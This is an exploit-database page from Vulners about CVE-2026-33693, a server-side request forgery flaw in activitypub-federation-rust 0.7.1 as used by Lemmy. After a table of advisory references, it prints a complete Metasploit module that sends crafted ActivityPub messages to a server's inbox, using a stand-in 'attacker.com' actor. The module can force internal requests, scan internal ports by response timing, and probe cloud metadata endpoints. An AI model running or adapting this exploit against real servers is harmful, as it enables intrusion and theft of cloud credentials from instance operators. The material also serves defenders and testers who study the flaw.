Vulners
Lucene search
📄 Activitypub-federation-rust 0.7.1 Server-Side Request Forgery
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2026-33693 | 27 Mar 202600:03 | – | attackerkb |
 | CVE-2026-33693 | 23 Mar 202615:39 | – | circl |
 | Lemmy 代码问题漏洞 | 27 Mar 202600:00 | – | cnnvd |
 | CVE-2026-33693 | 27 Mar 202600:03 | – | cve |
 | CVE-2026-33693 Lemmy's Activitypub-Federation has SSRF via 0.0.0.0 bypass in activitypub-federation-rust v4_is_invalid() | 27 Mar 202600:03 | – | cvelist |
 | Activitypub-Federation has SSRF via 0.0.0.0 bypass in activitypub-federation-rust v4_is_invalid() | 25 Mar 202620:23 | – | github |
 | Activitypub-Federation has SSRF via 0.0.0.0 bypass in activitypub-federation-rust v4_is_invalid() | 25 Mar 202600:00 | – | gitlab |
 | CVE-2026-33693 | 27 Mar 202601:16 | – | nvd |
 | CVE-2026-33693 Lemmy's Activitypub-Federation has SSRF via 0.0.0.0 bypass in activitypub-federation-rust v4_is_invalid() | 27 Mar 202600:03 | – | osv |
| GHSA-7723-35V7-QCXW Server-Side Request Forgery (SSRF) in activitypub_federation | 10 Feb 202520:25 | – | osv |
10
==================================================================================================================================
| # Title : Activitypub-federation-rust 0.7.1 Lemmy ActivityPub SSRF Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/LemmyNet/activitypub-federation-rust/releases |
==================================================================================================================================
[+] Summary : This Metasploit auxiliary module targets a Server-Side Request Forgery (SSRF) vulnerability in Lemmy / ActivityPub implementations using the activitypub-federation-rust 0.7.1 library.
The issue allows crafted ActivityPub messages to trigger server-side requests to internal or restricted network resources.
[+] POC :
require 'json'
require 'time'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Lemmy ActivityPub SSRF (CVE-2026-33693)',
'Description' => %q{
Exploits SSRF via ActivityPub using 0.0.0.0 bypass.
Designed for CTF and controlled environments.
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-33693']
],
'DisclosureDate' => '2026-03-23',
'License' => MSF_LICENSE
)
)
register_options([
OptString.new('TARGET_URI', [true, 'Base path', '/']),
OptString.new('INTERNAL_HOST', [true, 'Internal host', '0.0.0.0']),
OptString.new('INTERNAL_PORT', [false, 'Internal port']),
OptString.new('INTERNAL_PATH', [false, 'Internal path']),
OptEnum.new('ATTACK_TYPE', [true, 'Attack type',
'SINGLE', ['SINGLE','PORT_SCAN','METADATA']]),
OptString.new('PORTS', [false, 'Ports list', '80,443,8080']),
OptInt.new('SCAN_DELAY', [false, 'Delay', 1]),
OptBool.new('VERBOSE', [false, 'Verbose', false])
])
end
def run
print_status("Starting SSRF module")
case datastore['ATTACK_TYPE']
when 'SINGLE'
single_ssrf_attack
when 'PORT_SCAN'
port_scan_attack
when 'METADATA'
metadata_attack
end
end
def target_url
proto = datastore['SSL'] ? 'https' : 'http'
host = datastore['RHOSTS']
"#{proto}://#{host}:#{datastore['RPORT']}"
end
def create_payload(url)
{
'@context' => 'https://www.w3.org/ns/activitystreams',
'type' => 'Create',
'id' => "#{target_url}/test-#{rand(9999)}",
'actor' => 'https://attacker.com/actor',
'to' => ['https://www.w3.org/ns/activitystreams#Public'],
'object' => {
'type' => 'Note',
'attachment' => [
{
'type' => 'Link',
'href' => "http://#{url}"
}
]
}
}
end
def send_ssrf(url)
begin
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGET_URI'], 'inbox'),
'ctype' => 'application/activity+json',
'data' => create_payload(url).to_json
)
return res
rescue => e
vprint_error("Error: #{e}")
return nil
end
end
def single_ssrf_attack
host = datastore['INTERNAL_HOST']
port = datastore['INTERNAL_PORT']
path = datastore['INTERNAL_PATH']
url = host
url += ":#{port}" if port
url += "/#{path}" if path
print_status("Targeting #{url}")
res = send_ssrf(url)
if res
print_good("Response: #{res.code}")
print_line(res.body[0..200]) if res.body
else
print_error("No response")
end
end
def port_scan_attack
ports = datastore['PORTS'].split(',').map(&:to_i)
host = datastore['INTERNAL_HOST']
open_ports = []
ports.each do |p|
url = "#{host}:#{p}"
start = Time.now
res = send_ssrf(url)
elapsed = Time.now - start
if res && res.code != 404 && elapsed > 0.2
print_good("Port #{p} OPEN (#{res.code})")
open_ports << p
else
vprint_status("Port #{p} closed")
end
sleep datastore['SCAN_DELAY']
end
print_good("Open ports: #{open_ports.join(', ')}") unless open_ports.empty?
end
def metadata_attack
targets = [
"0.0.0.0/latest/meta-data/",
"0.0.0.0/computeMetadata/v1/",
"0.0.0.0/169.254.169.254/latest/"
]
targets.each do |t|
print_status("Trying #{t}")
res = send_ssrf(t)
if res && res.code == 200 && res.body
print_good("Metadata FOUND")
print_line(res.body[0..200])
else
vprint_status("No data")
end
sleep 1
end
end
def vprint_status(msg)
print_status(msg) if datastore['VERBOSE']
end
def vprint_error(msg)
print_error(msg) if datastore['VERBOSE']
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Apr 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.16.5
EPSS0.00359
SSVC